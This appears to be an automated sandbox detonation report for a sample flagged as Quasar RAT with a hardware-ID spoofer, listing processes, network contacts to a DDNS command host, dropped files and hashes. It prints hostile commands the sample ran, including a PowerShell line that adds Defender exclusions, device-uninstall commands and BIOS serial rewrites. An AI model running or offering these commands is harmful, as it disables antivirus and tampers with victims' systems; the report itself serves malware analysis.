"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7O6P-3ZMS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7O6P-3ZMS

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 9AZV-GF4V

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 9AZV-GF4V

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGR-ZOP3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGR-ZOP3

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O38K-RLEI

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: O38K-RLEI

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 8FZG-IIZK

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 8FZG-IIZK

Network

Country Destination Domain Proto
US 8.8.8.8:53 brofisthej.ddns.net udp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 gaming7core.info udp
RU 45.15.156.156:80 gaming7core.info tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
RU 45.15.156.156:80 gaming7core.info tcp
SE 2.70.186.204:4822 brofisthej.ddns.net tcp

Files

memory/2380-2-0x0000000002040000-0x0000000002080000-memory.dmp

memory/2380-1-0x0000000074C90000-0x000000007523B000-memory.dmp

memory/2380-0-0x0000000074C90000-0x000000007523B000-memory.dmp

memory/1204-9-0x00000000003A0000-0x00000000006C4000-memory.dmp

memory/2380-18-0x0000000074C90000-0x000000007523B000-memory.dmp

memory/2380-17-0x000000000BF70000-0x000000000CDE4000-memory.dmp

memory/2084-20-0x0000000000400000-0x0000000001274000-memory.dmp

memory/2084-21-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

memory/1204-22-0x000000001AA70000-0x000000001AAF0000-memory.dmp

memory/2004-56-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/2004-58-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2084-59-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

memory/2732-66-0x0000000002A90000-0x0000000002AD0000-memory.dmp

memory/2732-70-0x0000000002A90000-0x0000000002AD0000-memory.dmp

memory/1264-75-0x00000000009C0000-0x0000000000CE4000-memory.dmp

memory/1264-76-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/1264-77-0x000000001B1E0000-0x000000001B260000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 1421378b1fa1b2bec518c7b05c137359
SHA1 f9434edd2d2519865f650ad4983722b84b006310
SHA256 9536b587fa1b06be4579cfb144cdb5d0ee43e265647a4d1e02205e0c845ed9d1
SHA512 fee464b29fc498dc58d9553b26a3818e95713682fc0072deca0a6e86027a168d4e2b55cb90c226e0b55d13f565d9fd3c42863a7ae1a8f2f3d797ce3d79adb599

memory/2732-72-0x0000000002A90000-0x0000000002AD0000-memory.dmp

memory/2004-79-0x0000000000300000-0x000000000030E000-memory.dmp

memory/1204-80-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/2004-81-0x0000000077720000-0x0000000077721000-memory.dmp

memory/2732-85-0x00000000745C0000-0x0000000074B6B000-memory.dmp

memory/2004-86-0x0000000077700000-0x0000000077701000-memory.dmp

memory/2004-90-0x0000000000310000-0x000000000031E000-memory.dmp

memory/2004-94-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/2004-96-0x00000000005C0000-0x00000000005CC000-memory.dmp

memory/2004-97-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-99-0x0000000000610000-0x000000000061E000-memory.dmp

memory/2004-101-0x0000000000620000-0x000000000062C000-memory.dmp

memory/2004-103-0x00000000776B0000-0x00000000776B1000-memory.dmp

memory/2004-107-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-110-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-118-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-111-0x000000001AF10000-0x000000001AF90000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 afee842ff36d649e3a1756770bad94c0
SHA1 4d95482ee57bdc9e0c80bad91a7d1f2009ad8621
SHA256 964440431e83dfd5fd24d020381ca01ac978a9caa4222b20a42516edf2e51029
SHA512 99715d5e262fe341df4524339c8626119dedbc448cafa9aa2e624c59c9bb49aa84499e1504c7825f73ffd0cb80a57457ae5ce3324b040da79f8ec45ebbd9543c

C:\Users\Admin\AppData\Local\Temp\s3KUFe101b.bat

MD5 7c069b491dab404fbd1d9cf5b4733884
SHA1 ad481b7dd17be9fa2e887009b465250dd8a922b2
SHA256 253c4841a4c177b3522f65124a02ea36ee39bc84ca0456b05feb6127434f7ff9
SHA512 86623f2006bc11ce881237168e879ead47122c54a6869f9a2ba25e24771a8be23a5398606b0a3c11f642e0cb8670589dd706cfc35d1c61b4e96a975337c75e15

memory/2104-157-0x000007FEEC530000-0x000007FEECECD000-memory.dmp

memory/1720-162-0x0000000002254000-0x0000000002257000-memory.dmp

memory/1260-163-0x0000000002C44000-0x0000000002C47000-memory.dmp

memory/1732-165-0x000007FEEC530000-0x000007FEECECD000-memory.dmp

memory/2104-166-0x000007FEEC530000-0x000007FEECECD000-memory.dmp

memory/2104-164-0x000007FEEC530000-0x000007FEECECD000-memory.dmp

memory/2104-161-0x0000000002D30000-0x0000000002DB0000-memory.dmp

memory/1260-160-0x0000000002C4B000-0x0000000002CB2000-memory.dmp

memory/1816-159-0x0000000002B5B000-0x0000000002BC2000-memory.dmp

memory/1816-158-0x0000000002B54000-0x0000000002B57000-memory.dmp

memory/1816-156-0x000007FEEC530000-0x000007FEECECD000-memory.dmp

memory/1260-155-0x000007FEEC530000-0x000007FEECECD000-memory.dmp

memory/2104-148-0x0000000002660000-0x0000000002668000-memory.dmp

memory/2004-143-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/1260-142-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/2004-109-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-108-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/1264-106-0x000000001B1E0000-0x000000001B260000-memory.dmp

memory/2004-105-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/2004-104-0x000000001AF10000-0x000000001AF90000-memory.dmp

memory/1264-102-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

memory/2004-93-0x00000000005B0000-0x00000000005BE000-memory.dmp

memory/2004-91-0x00000000776F0000-0x00000000776F1000-memory.dmp

memory/2004-88-0x00000000005F0000-0x0000000000608000-memory.dmp

memory/2004-84-0x0000000077710000-0x0000000077711000-memory.dmp

memory/2004-83-0x00000000005D0000-0x00000000005EC000-memory.dmp

memory/2732-68-0x00000000745C0000-0x0000000074B6B000-memory.dmp

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 33d7a84f8ef67fd005f37142232ae97e
SHA1 1f560717d8038221c9b161716affb7cd6b14056e
SHA256 a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b
SHA512 c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

C:\ProgramData\Microsoft\Windows\DevManView.cfg

MD5 43b37d0f48bad1537a4de59ffda50ffe
SHA1 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8
SHA256 fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288
SHA512 cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82

C:\ProgramData\Microsoft\Windows\Disk.bat

MD5 250e75ba9aac6e2e9349bdebc5ef104e
SHA1 7efdaef5ec1752e7e29d8cc4641615d14ac1855f
SHA256 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516
SHA512 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438

\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 81a45f1a91448313b76d2e6d5308aa7a
SHA1 0d615343d5de03da03bce52e11b233093b404083
SHA256 fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd
SHA512 675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

memory/2732-65-0x00000000745C0000-0x0000000074B6B000-memory.dmp

memory/2084-55-0x0000000000400000-0x0000000001274000-memory.dmp

memory/2004-48-0x00000000013E0000-0x00000000014CA000-memory.dmp

memory/1204-10-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 c4d09d3b3516550ad2ded3b09e28c10c
SHA1 7a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA256 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA512 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe

MD5 79337964db81ce4114b63d41ffb36aa9
SHA1 be2adbff05b94d71e77f5afbf9dc88db287d9d02
SHA256 adb779423182df8da466c195d7162f9a2da10dbe0eb3221d82ab0a1d114a3abb
SHA512 13831d3e1bf8d92455cdd2e51d6397dbef1b83b6cb789f2eba7011671287c4449ca4337b6b3ed9576129b90f7c3c670eea7cbf4c4147f1ebe14a6d0f0b33584f

memory/2080-297-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2080-295-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2080-294-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2080-293-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2080-292-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2080-291-0x0000000140000000-0x000000014000E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dd759eab95bc481e2b005b77097e6e97
SHA1 3e10706368485b26411c7ab10be2e4671da635f9
SHA256 c2af03b9eafaa2796a851936aa5c842f9fca4b603b099a6a78be39b4f4a15aeb
SHA512 68322d03a3e81b20b21dc17affc165f1d41ea8a6f4784bef6e615534fa6107af5ff2b7aac4ca982f4de8b12c709d28bd4cdeab050316fd59264d721aa4796fb5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4f944271ab3bfa9f36c3fbd0525ccf67
SHA1 35f22f87c68cae91e41f4449682a5b44de337a14
SHA256 6477e36494de9cbf54c32fbc5b1368ea0ca877fb8d2d1d864e9f9d9d25236812
SHA512 675307073139509f2bcb6aeb8c1a0870454d46cfbf2f6ed48ca4d61f2faa2ab8636aea5557d50f9d61815a465422efa564c5da3a10b11d610e7e5b766830549c

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-05 11:46

Reported

2024-01-05 11:50

Platform

win10v2004-20231215-en

Max time kernel

64s

Max time network

172s

Command Line

"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe

"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: JZH3-KRJ1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: JZH3-KRJ1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28756HP-TRGT27103AB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428769HP-TRGT4560FA

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328772HP-TRGT15309DQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728772HP-TRGT15309MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628769HP-TRGT4560FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528769HP-TRGT4560SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828769HP-TRGT4560SG

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228769HP-TRGT4560RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728788HP-TRGT3515MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628788HP-TRGT3515FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328788HP-TRGT3515DQ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428788HP-TRGT3515FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528788HP-TRGT3515SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828788HP-TRGT3515SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228788HP-TRGT3515RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28788HP-TRGT3515AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28805HP-TRGT24489AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328805HP-TRGT24489DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728805HP-TRGT24489MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628805HP-TRGT24489FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

